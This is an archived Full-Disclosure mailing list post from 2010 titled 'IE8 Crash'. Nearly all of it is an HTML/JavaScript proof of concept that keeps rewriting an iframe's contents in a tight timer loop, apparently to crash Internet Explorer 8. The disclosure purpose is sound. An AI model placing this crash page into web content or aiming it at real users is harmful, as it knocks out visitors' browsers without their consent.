lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Sun, 17 Jan 2010 20:45:00 -0700
From: Stack Smasher <stacksmasher@...il.com>
To: full-disclosure <full-disclosure@...ts.grok.org.uk>
Subject: IE8 Crash

<html>

<body>

<script>

var div_html = '<div><div>foo<br /><a href="#">foo</a></div><div
id="1foo">foo<br /><a href="#">foo</a> | <a href="#">foo</a></div><div
id="2foo"><a href="#">foo</a><br />foo<br />foo</div><div id="3foo"><a
href="#">foo</a></div></div>';

var frame;

function newIFrame(){

document.body.appendChild(frame = document.createElement("iframe"));

setTimeout(changeBody,100);

}

var y = 0;

function changeBody(){

frame.contentWindow.document.body.innerHTML = y++ + div_html;

setTimeout(changeBody,1);

}

setTimeout(newIFrame,1);

</script>

</body>

</html>



-- 
"If you see me laughing, you better have backups"

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ